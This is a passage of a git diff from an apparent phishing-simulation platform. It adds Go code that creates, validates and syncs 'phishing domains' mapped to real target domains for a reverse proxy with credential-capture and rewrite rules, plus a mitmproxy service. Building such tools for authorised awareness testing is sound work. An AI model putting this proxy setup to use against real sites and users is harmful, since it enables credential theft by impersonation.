originalDomain)), + "proxyConfig", + ) + } + + // validate that phishing domain doesn't already exist (unless it's managed by this proxy) + phishingDomainVO, err := vo.NewString255(domainConfig.To) + if err != nil { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("invalid phishing domain format: %s", domainConfig.To)), + "proxyConfig", + ) + } + + existingDomain, err := m.DomainRepository.GetByName(ctx, phishingDomainVO, &repository.DomainOption{}) + if err != nil && !errors.Is(err, gorm.ErrRecordNotFound) { + return err + } + if existingDomain != nil { + // check if this domain is managed by a different proxy or is a regular domain + if existingDomain.Type.MustGet().String() != "proxy" { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("domain '%s' already exists as a regular domain", domainConfig.To)), + "proxyConfig", + ) + } else { + // it's a proxy domain, check if it belongs to a different proxy + existingTarget, err := existingDomain.ProxyTargetDomain.Get() + if err == nil { + startURL, err := proxy.StartURL.Get() + if err == nil { + // extract domain from start URL for comparison + startURLParsed, err := url.Parse(startURL.String()) + if err == nil && existingTarget.String() != startURLParsed.Host { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("phishing domain '%s' is already used by another Proxy configuration", domainConfig.To)), + "proxyConfig", + ) + } + } + } + } + } + + // validate domain-specific capture rules + if err := m.validateCaptureRules(domainConfig.Capture); err != nil { + return err + } + + // validate domain-specific rewrite rules + if err := m.validateReplaceRules(domainConfig.Rewrite); err != nil { + return err + } + + // validate that phishing domain is not used by another proxy + if err := m.validatePhishingDomainUniquenessByStartURL(ctx, domainConfig.To, proxy.StartURL.MustGet().String()); err != nil { + return err + } + } + + // validate global capture and rewrite rules + if 
config.Global != nil { + if err := m.validateCaptureRules(config.Global.Capture); err != nil { + return err + } + if err := m.validateReplaceRules(config.Global.Rewrite); err != nil { + return err + } + } + + return nil +} + +// validateGlobalCaptureNameUniqueness ensures all capture rule names are unique across the entire Proxy configuration +func (m *Proxy) validateGlobalCaptureNameUniqueness(config *ProxyServiceConfigYAML) error { + allCaptureNames := make(map[string]string) // name -> location + + // collect all capture names from domain-specific rules + for domain, domainConfig := range config.Hosts { + for _, capture := range domainConfig.Capture { + if capture.Name == "" { + continue // this will be caught by other validation + } + + if existingLocation, exists := allCaptureNames[capture.Name]; exists { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("duplicate capture rule name '%s' found in domain '%s' - already used in %s", capture.Name, domain, existingLocation)), + "proxyConfig", + ) + } + allCaptureNames[capture.Name] = fmt.Sprintf("domain '%s'", domain) + } + } + + // collect all capture names from global rules + if config.Global != nil { + for _, capture := range config.Global.Capture { + if capture.Name == "" { + continue // this will be caught by other validation + } + + if existingLocation, exists := allCaptureNames[capture.Name]; exists { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("duplicate capture rule name '%s' found in global rules - already used in %s", capture.Name, existingLocation)), + "proxyConfig", + ) + } + allCaptureNames[capture.Name] = "global rules" + } + } + + return nil +} + +// applyConfigurationDefaults applies default values to Proxy configuration for display +func (m *Proxy) applyConfigurationDefaults(proxy *model.Proxy) error { + proxyConfig, err := proxy.ProxyConfig.Get() + if err != nil { + return err + } + + // parse complete YAML structure + var config ProxyServiceConfigYAML + if err := 
yaml.Unmarshal([]byte(proxyConfig.String()), &config); err != nil { + return err + } + + // apply defaults + m.setProxyConfigDefaults(&config) + + // marshal back to YAML + updatedConfigBytes, err := yaml.Marshal(&config) + if err != nil { + return err + } + + // update the Proxy configuration with defaults applied + updatedConfigVO := vo.NewString1MBMust(string(updatedConfigBytes)) + proxy.ProxyConfig = nullable.NewNullableWithValue(*updatedConfigVO) + return nil +} + +// deleteProxyDomains deletes all domains associated with a proxy +func (m *Proxy) deleteProxyDomains(ctx context.Context, session *model.Session, proxyID *uuid.UUID, proxy *model.Proxy) error { + proxyConfig, err := proxy.ProxyConfig.Get() + if err != nil { + return err + } + + // parse complete YAML structure + var config ProxyServiceConfigYAML + if err := yaml.Unmarshal([]byte(proxyConfig.String()), &config); err != nil { + return err + } + + // set default values + m.setProxyConfigDefaults(&config) + + // delete domains for each mapping + for _, domainConfig := range config.Hosts { + if domainConfig == nil { + continue + } + + // get domain by name and delete if it's a proxy domain + phishingDomainVO, err := vo.NewString255(domainConfig.To) + if err != nil { + continue + } + + existingDomain, err := m.DomainRepository.GetByName(ctx, phishingDomainVO, &repository.DomainOption{}) + if err == nil && existingDomain != nil { + // delete old domains that have proxy type + if existingDomain.Type.MustGet().String() == "proxy" { + domainID, err := existingDomain.ID.Get() + if err == nil { + err = m.DomainService.DeleteProxyDomain(ctx, session, &domainID) + if err != nil { + m.Logger.Warnw("failed to delete proxy domain", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + "error", err, + ) + } else { + m.Logger.Debugw("deleted proxy domain", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + ) + } + } + } + } + } + + return nil +} + +// validatePhishingDomainUniqueness checks if a 
phishing domain is already used by another proxy
func (m *Proxy) validatePhishingDomainUniqueness(ctx context.Context, phishingDomain string, excludeProxyID *uuid.UUID) error {
	phishingDomainVO, err := vo.NewString255(phishingDomain)
	if err != nil {
		return validate.WrapErrorWithField(
			fmt.Errorf("invalid phishing domain format: %s", phishingDomain),
			"proxyConfig",
		)
	}

	existingDomain, err := m.DomainRepository.GetByName(ctx, phishingDomainVO, &repository.DomainOption{})
	if err != nil && !errors.Is(err, gorm.ErrRecordNotFound) {
		return err
	}
	if existingDomain == nil {
		return nil
	}

	if existingDomain.Type.MustGet().String() != "proxy" {
		return validate.WrapErrorWithField(
			fmt.Errorf("domain '%s' already exists as a regular domain", phishingDomain),
			"proxyConfig",
		)
	}

	// domain is proxy-managed; when updating an existing proxy we allow reuse
	if excludeProxyID != nil {
		// this is a bit of a workaround - we'd need to track which proxy owns which domain
		// for now, we'll allow updates to existing proxy domains
		// TODO: add a proxy_id field to domains table for proper tracking
		return nil
	}

	return validate.WrapErrorWithField(
		fmt.Errorf("phishing domain '%s' is already used by another proxy", phishingDomain),
		"proxyConfig",
	)
}

// normalizeComparableHost lowercases and trims a stored proxy target and,
// when the value is a full URL, reduces it to just the host part so that
// targets stored as URLs and bare domains compare consistently.
func (m *Proxy) normalizeComparableHost(target string) (string, error) {
	normalized := strings.ToLower(strings.TrimSpace(target))
	if !strings.Contains(normalized, "://") {
		// already just a domain
		return normalized, nil
	}
	parsed, err := url.Parse(normalized)
	if err != nil {
		return "", err
	}
	return strings.ToLower(strings.TrimSpace(parsed.Host)), nil
}

// validatePhishingDomainUniquenessByStartURL checks if a phishing domain is
// already used by another proxy, identifying "another proxy" by comparing the
// existing domain's recorded target host against the current start URL host.
func (m *Proxy) validatePhishingDomainUniquenessByStartURL(ctx context.Context, phishingDomain string, currentStartURL string) error {
	phishingDomainVO, err := vo.NewString255(phishingDomain)
	if err != nil {
		return validate.WrapErrorWithField(
			fmt.Errorf("invalid phishing domain format: %s", phishingDomain),
			"proxyConfig",
		)
	}

	existingDomain, err := m.DomainRepository.GetByName(ctx, phishingDomainVO, &repository.DomainOption{})
	if err != nil && !errors.Is(err, gorm.ErrRecordNotFound) {
		return err
	}
	if existingDomain == nil {
		return nil
	}

	if existingDomain.Type.MustGet().String() != "proxy" {
		return validate.WrapErrorWithField(
			fmt.Errorf("domain '%s' already exists as a regular domain", phishingDomain),
			"proxyConfig",
		)
	}

	// no recorded target means there is nothing to compare against
	existingTarget, err := existingDomain.ProxyTargetDomain.Get()
	if err != nil {
		return nil
	}

	currentStartURLParsed, err := url.Parse(currentStartURL)
	if err != nil {
		return validate.WrapErrorWithField(
			fmt.Errorf("invalid start URL format: %s", currentStartURL),
			"proxyConfig",
		)
	}

	existingTargetNormalized, err := m.normalizeComparableHost(existingTarget.String())
	if err != nil {
		return validate.WrapErrorWithField(
			fmt.Errorf("invalid existing target URL format: %s", strings.ToLower(strings.TrimSpace(existingTarget.String()))),
			"proxyConfig",
		)
	}
	currentHostNormalized := strings.ToLower(strings.TrimSpace(currentStartURLParsed.Host))

	if existingTargetNormalized != currentHostNormalized {
		return validate.WrapErrorWithField(
			fmt.Errorf("phishing domain '%s' is already used by another Proxy configuration", phishingDomain),
			"proxyConfig",
		)
	}

	return nil
}

// validatePhishingDomainUniquenessForUpdate validates phishing domain uniqueness during proxy updates
+func (m *Proxy) validatePhishingDomainUniquenessForUpdate(ctx context.Context, phishingDomain string, currentStartURL string, currentProxyID *uuid.UUID) error { + m.Logger.Debugw("validating phishing domain uniqueness for update", + "phishingDomain", phishingDomain, + "currentStartURL", currentStartURL, + "currentProxyID", currentProxyID.String(), + ) + + phishingDomainVO, err := vo.NewString255(phishingDomain) + if err != nil { + m.Logger.Errorw("invalid phishing domain format", + "phishingDomain", phishingDomain, + "error", err, + ) + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("invalid phishing domain format: %s", phishingDomain)), + "proxyConfig", + ) + } + + existingDomain, err := m.DomainRepository.GetByName(ctx, phishingDomainVO, &repository.DomainOption{}) + if err != nil && !errors.Is(err, gorm.ErrRecordNotFound) { + m.Logger.Errorw("error getting existing domain", + "phishingDomain", phishingDomain, + "error", err, + ) + return err + } + + if existingDomain == nil { + m.Logger.Debugw("no existing domain found, validation passed", + "phishingDomain", phishingDomain, + ) + return nil + } + + m.Logger.Debugw("existing domain found", + "phishingDomain", phishingDomain, + "existingDomainType", existingDomain.Type.MustGet().String(), + ) + + if existingDomain.Type.MustGet().String() == "proxy" { + // check if it belongs to a different proxy by comparing target domains + existingTarget, err := existingDomain.ProxyTargetDomain.Get() + if err != nil { + m.Logger.Errorw("error getting existing domain proxy target", + "phishingDomain", phishingDomain, + "error", err, + ) + return err + } + + m.Logger.Debugw("existing domain proxy target found", + "phishingDomain", phishingDomain, + "existingTarget", existingTarget.String(), + ) + + // extract domain from current start URL for comparison + currentStartURLParsed, err := url.Parse(currentStartURL) + if err != nil { + m.Logger.Errorw("error parsing current start URL", + "currentStartURL", 
currentStartURL, + "error", err, + ) + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("invalid start URL format: %s", currentStartURL)), + "proxyConfig", + ) + } + + // normalize and extract domain for comparison + existingTargetStr := strings.ToLower(strings.TrimSpace(existingTarget.String())) + currentHostNormalized := strings.ToLower(strings.TrimSpace(currentStartURLParsed.Host)) + + // if existing target is a full URL, extract just the host part + var existingTargetNormalized string + if strings.Contains(existingTargetStr, "://") { + // it's a full URL, parse it to get the host + existingTargetParsed, err := url.Parse(existingTargetStr) + if err != nil { + m.Logger.Errorw("error parsing existing target URL", + "existingTarget", existingTargetStr, + "error", err, + ) + return err + } + existingTargetNormalized = strings.ToLower(strings.TrimSpace(existingTargetParsed.Host)) + } else { + // it's already just a domain + existingTargetNormalized = existingTargetStr + } + + m.Logger.Debugw("comparing normalized domains", + "phishingDomain", phishingDomain, + "existingTargetStr", existingTargetStr, + "existingTargetNormalized", existingTargetNormalized, + "currentHostNormalized", currentHostNormalized, + ) + + // if target domains don't match, it belongs to a different proxy + if existingTargetNormalized != currentHostNormalized { + m.Logger.Warnw("phishing domain belongs to different proxy", + "phishingDomain", phishingDomain, + "existingTargetNormalized", existingTargetNormalized, + "currentHostNormalized", currentHostNormalized, + "currentProxyID", currentProxyID.String(), + ) + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("phishing domain '%s' is already used by another Proxy configuration (existing target: %s, current target: %s)", phishingDomain, existingTargetNormalized, currentHostNormalized)), + "proxyConfig", + ) + } + + // if target domains match, this domain belongs to the current proxy being updated, so it's allowed + 
m.Logger.Debugw("phishing domain belongs to current proxy, allowing reuse", + "domain", phishingDomain, + "proxyID", currentProxyID.String(), + "existingTarget", existingTargetNormalized, + "currentHost", currentHostNormalized, + ) + } else { + m.Logger.Warnw("domain exists as regular domain, not proxy", + "phishingDomain", phishingDomain, + "existingDomainType", existingDomain.Type.MustGet().String(), + ) + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("domain '%s' already exists as a regular domain", phishingDomain)), + "proxyConfig", + ) + } + return nil +} + +// createProxyDomains creates domains for the proxy based on the configuration +func (m *Proxy) createProxyDomains(ctx context.Context, session *model.Session, proxyID *uuid.UUID, proxy *model.Proxy) error { + proxyConfig, err := proxy.ProxyConfig.Get() + if err != nil { + return fmt.Errorf("failed to get proxy config: %w", err) + } + + // parse complete YAML structure + var config ProxyServiceConfigYAML + if err := yaml.Unmarshal([]byte(proxyConfig.String()), &config); err != nil { + return fmt.Errorf("failed to parse proxy config YAML: %w", err) + } + + // set default values + m.setProxyConfigDefaults(&config) + + var companyID *uuid.UUID + if cid, err := proxy.CompanyID.Get(); err == nil { + companyID = &cid + } + + startURL := proxy.StartURL.MustGet() + createdDomains := make([]string, 0) + + // create domains for each mapping + for originalDomain, domainConfig := range config.Hosts { + if domainConfig == nil { + continue + } + + if domainConfig.To == "" { + m.Logger.Warnw("empty 'to' field in domain config", + "proxyID", proxyID.String(), + "originalDomain", originalDomain, + ) + // rollback created domains on error + m.rollbackCreatedDomains(ctx, session, createdDomains) + return fmt.Errorf("'to' field is required for domain mapping '%s'", originalDomain) + } + + // check if domain already exists (might be from previous failed attempt) + phishingDomainVO, err := 
vo.NewString255(domainConfig.To) + if err != nil { + m.Logger.Warnw("invalid phishing domain format", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + "error", err, + ) + // rollback created domains on error + m.rollbackCreatedDomains(ctx, session, createdDomains) + return fmt.Errorf("invalid phishing domain format %s: %w", domainConfig.To, err) + } + + existingDomain, err := m.DomainRepository.GetByName(ctx, phishingDomainVO, &repository.DomainOption{}) + if err == nil && existingDomain != nil { + // domain already exists, check if it's compatible + if existingDomain.Type.MustGet().String() == "proxy" { + existingTarget, err := existingDomain.ProxyTargetDomain.Get() + if err == nil && existingTarget.String() == startURL.String() { + // compatible existing domain, skip creation + m.Logger.Debugw("proxy domain already exists, skipping creation", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + ) + createdDomains = append(createdDomains, domainConfig.To) + continue + } + } + // incompatible domain exists + m.Logger.Warnw("incompatible domain already exists", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + "existingType", existingDomain.Type.MustGet().String(), + ) + // rollback created domains on error + m.rollbackCreatedDomains(ctx, session, createdDomains) + return fmt.Errorf("domain %s already exists and is incompatible", domainConfig.To) + } else if err != nil && !errors.Is(err, gorm.ErrRecordNotFound) { + // database error + m.Logger.Errorw("failed to check existing domain", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + "error", err, + ) + // rollback created domains on error + m.rollbackCreatedDomains(ctx, session, createdDomains) + return fmt.Errorf("failed to check existing domain %s: %w", domainConfig.To, err) + } + + // create new domain + domain := &model.Domain{} + domain.Name.Set(*vo.NewString255Must(domainConfig.To)) + domain.Type.Set(*vo.NewString32Must("proxy")) + domain.ProxyID.Set(*proxyID) + + 
// set the target domain to the original domain from the YAML config + proxyTargetDomain, err := vo.NewOptionalString255(originalDomain) + if err != nil { + m.Logger.Errorw("failed to create proxy target domain", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + "startURL", startURL.String(), + "error", err, + ) + // rollback created domains on error + m.rollbackCreatedDomains(ctx, session, createdDomains) + return fmt.Errorf("failed to create proxy target domain for %s: %w", domainConfig.To, err) + } + domain.ProxyTargetDomain.Set(*proxyTargetDomain) + + domain.HostWebsite.Set(false) + domain.ManagedTLS.Set(true) + domain.OwnManagedTLS.Set(false) + + pageContent, err := vo.NewOptionalString1MB("") + if err != nil { + m.Logger.Errorw("failed to create page content", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + "error", err, + ) + // rollback created domains on error + m.rollbackCreatedDomains(ctx, session, createdDomains) + return fmt.Errorf("failed to create page content for %s: %w", domainConfig.To, err) + } + domain.PageContent.Set(*pageContent) + + pageNotFoundContent, err := vo.NewOptionalString1MB("") + if err != nil { + m.Logger.Errorw("failed to create page not found content", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + "error", err, + ) + // rollback created domains on error + m.rollbackCreatedDomains(ctx, session, createdDomains) + return fmt.Errorf("failed to create page not found content for %s: %w", domainConfig.To, err) + } + domain.PageNotFoundContent.Set(*pageNotFoundContent) + + redirectURL, err := vo.NewOptionalString1024("") + if err != nil { + m.Logger.Errorw("failed to create redirect URL", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + "error", err, + ) + // rollback created domains on error + m.rollbackCreatedDomains(ctx, session, createdDomains) + return fmt.Errorf("failed to create redirect URL for %s: %w", domainConfig.To, err) + } + domain.RedirectURL.Set(*redirectURL) + + if 
companyID != nil { + domain.CompanyID.Set(*companyID) + } + + _, err = m.DomainService.CreateProxyDomain(ctx, session, domain) + if err != nil { + m.Logger.Errorw("failed to create proxy domain", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + "error", err, + ) + // rollback created domains on error + m.rollbackCreatedDomains(ctx, session, createdDomains) + return fmt.Errorf("failed to create domain %s: %w", domainConfig.To, err) + } + + createdDomains = append(createdDomains, domainConfig.To) + m.Logger.Debugw("created proxy domain", + "proxyID", proxyID.String(), + "domain", domainConfig.To, + ) + } + + m.Logger.Infow("successfully created all proxy domains", + "proxyID", proxyID.String(), + "domainsCreated", len(createdDomains), + "domains", createdDomains, + ) + + return nil +} + +// rollbackCreatedDomains attempts to delete domains that were created during a failed proxy creation +func (m *Proxy) rollbackCreatedDomains(ctx context.Context, session *model.Session, createdDomains []string) { + for _, domainName := range createdDomains { + phishingDomainVO, err := vo.NewString255(domainName) + if err != nil { + m.Logger.Warnw("failed to create domain VO for rollback", + "domain", domainName, + "error", err, + ) + continue + } + + existingDomain, err := m.DomainRepository.GetByName(ctx, phishingDomainVO, &repository.DomainOption{}) + if err != nil { + m.Logger.Warnw("failed to get domain for rollback", + "domain", domainName, + "error", err, + ) + continue + } + + if existingDomain != nil && existingDomain.Type.MustGet().String() == "proxy" { + domainID, err := existingDomain.ID.Get() + if err == nil { + err = m.DomainService.DeleteProxyDomain(ctx, session, &domainID) + if err != nil { + m.Logger.Warnw("failed to rollback proxy domain", + "domain", domainName, + "error", err, + ) + } else { + m.Logger.Debugw("rolled back proxy domain", + "domain", domainName, + ) + } + } + } + } +} + +// syncProxyDomains synchronizes domains for the proxy based on 
the configuration +func (m *Proxy) syncProxyDomains(ctx context.Context, session *model.Session, proxyID *uuid.UUID, proxy *model.Proxy) error { + proxyConfig, err := proxy.ProxyConfig.Get() + if err != nil { + return fmt.Errorf("failed to get proxy config for sync: %w", err) + } + + // get current proxy domains by proxy ID + currentDomainsResult, err := m.DomainService.GetByProxyID(ctx, session, proxyID) + if err != nil { + return fmt.Errorf("failed to get current proxy domains: %w", err) + } + + currentDomains := make(map[string]*model.Domain) + for _, domain := range currentDomainsResult.Rows { + currentDomains[domain.Name.MustGet().String()] = domain + } + + m.Logger.Debugw("found existing proxy domains for sync", + "proxyID", proxyID.String(), + "currentDomainCount", len(currentDomains), + "currentDomains", func() []string { + domains := make([]string, 0, len(currentDomains)) + for name := range currentDomains { + domains = append(domains, name) + } + return domains + }(), + ) + + // parse complete YAML structure + var config ProxyServiceConfigYAML + if err := yaml.Unmarshal([]byte(proxyConfig.String()), &config); err != nil { + return fmt.Errorf("failed to parse proxy config YAML for sync: %w", err) + } + + // set default values + m.setProxyConfigDefaults(&config) + + // get desired domains from config + desiredDomains := make(map[string]string) // phishing domain -> original domain + for originalDomain, domainConfig := range config.Hosts { + if domainConfig == nil { + continue + } + + if domainConfig.To != "" { + desiredDomains[domainConfig.To] = originalDomain + } + } + + m.Logger.Debugw("parsed desired domains from config", + "proxyID", proxyID.String(), + "desiredDomainCount", len(desiredDomains), + "desiredDomains", func() []string { + domains := make([]string, 0, len(desiredDomains)) + for name := range desiredDomains { + domains = append(domains, name) + } + return domains + }(), + ) + + // delete domains that are no longer needed + deletedCount := 0 + 
for phishingDomain, domain := range currentDomains { + if _, exists := desiredDomains[phishingDomain]; !exists { + m.Logger.Debugw("domain marked for deletion", + "proxyID", proxyID.String(), + "domain", phishingDomain, + ) + domainID, err := domain.ID.Get() + if err == nil { + err = m.DomainService.DeleteProxyDomain(ctx, session, &domainID) + if err != nil { + m.Logger.Warnw("failed to delete removed proxy domain", + "proxyID", proxyID.String(), + "domain", phishingDomain, + "error", err, + ) + } else { + m.Logger.Infow("deleted removed proxy domain", + "proxyID", proxyID.String(), + "domain", phishingDomain, + ) + deletedCount++ + } + } else { + m.Logger.Warnw("failed to get domain ID for deletion", + "proxyID", proxyID.String(), + "domain", phishingDomain, + "error", err, + ) + } + } else { + m.Logger.Debugw("domain still needed, keeping", + "proxyID", proxyID.String(), + "domain", phishingDomain, + ) + } + } + + // create or update domains that are needed + createdCount := 0 + updatedCount := 0 + errorCount := 0 + + for phishingDomain, originalDomain := range desiredDomains { + if existingDomain, exists := currentDomains[phishingDomain]; exists { + // domain already exists, check if target domain needs updating + needsUpdate := false + currentTarget, err := existingDomain.ProxyTargetDomain.Get() + + if err != nil || currentTarget.String() != originalDomain { + // update the target domain + proxyTargetDomain, err := vo.NewOptionalString255(originalDomain) + if err == nil { + existingDomain.ProxyTargetDomain.Set(*proxyTargetDomain) + needsUpdate = true + } else { + m.Logger.Warnw("failed to create proxy target domain for update", + "proxyID", proxyID.String(), + "domain", phishingDomain, + "error", err, + ) + errorCount++ + continue + } + } + + if needsUpdate { + domainID, err := existingDomain.ID.Get() + if err == nil { + err = m.DomainService.UpdateProxyDomain(ctx, session, &domainID, existingDomain) + if err != nil { + m.Logger.Warnw("failed to update existing 
proxy domain", + "proxyID", proxyID.String(), + "domain", phishingDomain, + "error", err, + ) + errorCount++ + } else { + m.Logger.Debugw("updated existing proxy domain", + "proxyID", proxyID.String(), + "domain", phishingDomain, + ) + updatedCount++ + } + } else { + m.Logger.Warnw("failed to get domain ID for update", + "proxyID", proxyID.String(), + "domain", phishingDomain, + "error", err, + ) + errorCount++ + } + } + } else { + // create new domain + domain := &model.Domain{} + domain.Name.Set(*vo.NewString255Must(phishingDomain)) + domain.Type.Set(*vo.NewString32Must("proxy")) + domain.ProxyID.Set(*proxyID) + + proxyTargetDomain, err := vo.NewOptionalString255(originalDomain) + if err != nil { + m.Logger.Warnw("failed to create proxy target domain", + "proxyID", proxyID.String(), + "domain", phishingDomain, + "originalDomain", originalDomain, + "error", err, + ) + errorCount++ + continue + } + domain.ProxyTargetDomain.Set(*proxyTargetDomain) + + domain.HostWebsite.Set(false) + domain.ManagedTLS.Set(true) + domain.OwnManagedTLS.Set(false) + + pageContent, err := vo.NewOptionalString1MB("") + if err != nil { + m.Logger.Warnw("failed to create page content for proxy domain", + "proxyID", proxyID.String(), + "domain", phishingDomain, + "error", err, + ) + errorCount++ + continue + } + domain.PageContent.Set(*pageContent) + + pageNotFoundContent, err := vo.NewOptionalString1MB("") + if err != nil { + m.Logger.Warnw("failed to create page not found content for proxy domain", + "proxyID", proxyID.String(), + "domain", phishingDomain, + "error", err, + ) + errorCount++ + continue + } + domain.PageNotFoundContent.Set(*pageNotFoundContent) + + redirectURL, err := vo.NewOptionalString1024("") + if err != nil { + m.Logger.Warnw("failed to create redirect URL for proxy domain", + "proxyID", proxyID.String(), + "domain", phishingDomain, + "error", err, + ) + errorCount++ + continue + } + domain.RedirectURL.Set(*redirectURL) + + var companyID *uuid.UUID + if cid, err := 
proxy.CompanyID.Get(); err == nil { + companyID = &cid + domain.CompanyID.Set(*companyID) + } + + _, err = m.DomainService.CreateProxyDomain(ctx, session, domain) + if err != nil { + m.Logger.Warnw("failed to create new proxy domain", + "proxyID", proxyID.String(), + "domain", phishingDomain, + "error", err, + ) + errorCount++ + } else { + m.Logger.Debugw("created new proxy domain", + "proxyID", proxyID.String(), + "domain", phishingDomain, + ) + createdCount++ + } + } + } + + m.Logger.Infow("completed proxy domain synchronization", + "proxyID", proxyID.String(), + "domainsDeleted", deletedCount, + "domainsCreated", createdCount, + "domainsUpdated", updatedCount, + "errors", errorCount, + ) + + if errorCount > 0 { + return fmt.Errorf("proxy domain sync completed with %d errors", errorCount) + } + + return nil +} + +// DeleteByID deletes a proxy by ID +func (m *Proxy) DeleteByID( + ctx context.Context, + session *model.Session, + id *uuid.UUID, +) error { + ae := NewAuditEvent("Proxy.DeleteByID", session) + ae.Details["id"] = id.String() + // check permissions + isAuthorized, err := IsAuthorized(session, data.PERMISSION_ALLOW_GLOBAL) + if err != nil && !errors.Is(err, errs.ErrAuthorizationFailed) { + m.LogAuthError(err) + return err + } + if !isAuthorized { + m.AuditLogNotAuthorized(ae) + return errs.ErrAuthorizationFailed + } + + // get current proxy before deletion to access its domains + current, err := m.ProxyRepository.GetByID(ctx, id, &repository.ProxyOption{}) + if err != nil && !errors.Is(err, gorm.ErrRecordNotFound) { + m.Logger.Errorw("failed to get proxy for domain cleanup", "error", err) + return err + } + + // delete associated proxy domains + if current != nil { + err = m.deleteProxyDomains(ctx, session, id, current) + if err != nil { + m.Logger.Errorw("failed to delete proxy domains", "error", err) + // continue with proxy deletion even if domain cleanup fails + } + } + + // remove the relation from campaign templates + err = 
m.CampaignTemplateService.RemoveProxiesByProxyID( + ctx, + session, + id, + ) + if err != nil { + m.Logger.Errorw("failed to remove proxy ID relations from campaign templates", "error", err) + return err + } + + // delete proxy + err = m.ProxyRepository.DeleteByID( + ctx, + id, + ) + if err != nil { + m.Logger.Errorw("failed to delete proxy by ID", "error", err) + return err + } + m.AuditLogAuthorized(ae) + + return nil +} diff --git a/backend/validate/validate.go b/backend/validate/validate.go index 9cec9df..33cfb3e 100644 --- a/backend/validate/validate.go +++ b/backend/validate/validate.go @@ -6,6 +6,7 @@ package validate import ( "fmt" "net/mail" + "net/url" "regexp" "slices" "strings" @@ -412,3 +413,88 @@ func OneOfNullableFieldsRequired(fields map[string]any) error { keys := utils.MapKeys(fields) return fmt.Errorf("one of the fields (%s) must be supplied", strings.Join(keys, ", ")) } + +// ErrorIfInvalidURL validates that a string is a valid URL with http/https scheme +func ErrorIfInvalidURL(urlStr string) error { + if urlStr == "" { + return errs.NewValidationError( + errors.New("URL cannot be empty"), + ) + } + + // validate that URL is parseable + parsedURL, err := url.Parse(urlStr) + if err != nil { + return errs.NewValidationError( + errors.New("must be a valid URL"), + ) + } + + // ensure it has a valid scheme (http or https) + if parsedURL.Scheme != "http" && parsedURL.Scheme != "https" { + return errs.NewValidationError( + errors.New("must use http or https protocol"), + ) + } + + // ensure it has a valid host + if parsedURL.Host == "" { + return errs.NewValidationError( + errors.New("must have a valid host"), + ) + } + + // extract hostname (removes port if present) for domain validation + hostname := parsedURL.Hostname() + if hostname == "" { + return errs.NewValidationError( + errors.New("must have a valid hostname"), + ) + } + + // basic domain validation + if !isValidDomain(hostname) { + return errs.NewValidationError( + errors.New("must have a 
valid domain"), + ) + } + + return nil +} + +// isValidDomain performs basic domain name validation +// supports international domain names (IDNs) +func isValidDomain(domain string) bool { + // basic checks - length limits + if len(domain) == 0 || len(domain) > 253 { + return false + } + + // must contain at least one dot + if !strings.Contains(domain, ".") { + return false + } + + // cannot start or end with dash or dot + if strings.HasPrefix(domain, "-") || strings.HasSuffix(domain, "-") || + strings.HasPrefix(domain, ".") || strings.HasSuffix(domain, ".") { + return false + } + + // check each label + labels := strings.Split(domain, ".") + for _, label := range labels { + if len(label) == 0 || len(label) > 63 { + return false + } + + // label cannot start or end with dash + if strings.HasPrefix(label, "-") || strings.HasSuffix(label, "-") { + return false + } + + // removed restrictive ascii-only character check to support international domains + } + + return true +} diff --git a/backend/vo/generic.go b/backend/vo/generic.go index 4668528..6411dfd 100644 --- a/backend/vo/generic.go +++ b/backend/vo/generic.go @@ -12,6 +12,60 @@ import ( "github.com/phishingclub/phishingclub/validate" ) +// String32 is a trimmed string with a min of 1 and a max of 32 +type String32 struct { + inner string +} + +// NewString32 creates a new short string +func NewString32(s string) (*String32, error) { + s = strings.TrimSpace(s) + err := validate.ErrorIfStringNotbetweenOrEqualTo(s, 1, 32) + if err != nil { + return nil, errs.Wrap(err) + } + return &String32{ + inner: s, + }, nil +} + +// NewString32Must creates a new short string and panics if it fails +func NewString32Must(s string) *String32 { + a, err := NewString32(s) + if err != nil { + panic(err) + } + return a +} + +// MarshalJSON implements the json.Marshaler interface +func (s String32) MarshalJSON() ([]byte, error) { + return json.Marshal(s.inner) +} + +// UnmarshalJSON unmarshals the json into a string +func (s 
*String32) UnmarshalJSON(data []byte) error { + var str string + if err := json.Unmarshal(data, &str); err != nil { + return err + } + ss, err := NewString32(str) + if err != nil { + unwrapped := errors.Unwrap(err) + if unwrapped == nil { + return err + } + return unwrapped + } + s.inner = ss.inner + return nil +} + +// String returns the string representation of the short string +func (s String32) String() string { + return s.inner +} + // String64 is a trimmed string with a min of 1 and a max of 64 type String64 struct { inner string diff --git a/docker-compose.yml b/docker-compose.yml index 31de3e2..7345fc3 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -150,6 +150,23 @@ services: networks: - default + # mitmproxy - HTTP/HTTPS proxy for security research and debugging + # Web interface: http://localhost:8105 (check logs for auto-generated token) - Proxy available at 172.20.0.138:8080 + # Use this IP in your Proxy configs: proxy: '172.20.0.138:8080' + mitmproxy: + image: mitmproxy/mitmproxy:latest + command: mitmweb --web-host 0.0.0.0 --web-port 8080 --listen-port 8081 --no-web-open-browser + tty: true + ports: + - "8105:8080" # Web interface + - "8106:8081" # Proxy port (for external access) + volumes: + - mitmproxy_data:/home/mitmproxy/.mitmproxy + restart: unless-stopped + networks: + default: + ipv4_address: 172.20.0.138 + # DNS Server for .test domain resolution dns: restart: always @@ -166,6 +183,9 @@ services: default: ipv4_address: 172.20.0.137 +volumes: + mitmproxy_data: + networks: default: driver: bridge diff --git a/frontend/src/lib/api/api.js b/frontend/src/lib/api/api.js index a998180..504fe62 100644 --- a/frontend/src/lib/api/api.js +++ b/frontend/src/lib/api/api.js @@ -907,8 +907,11 @@ export class API { * @param {string} template.companyID 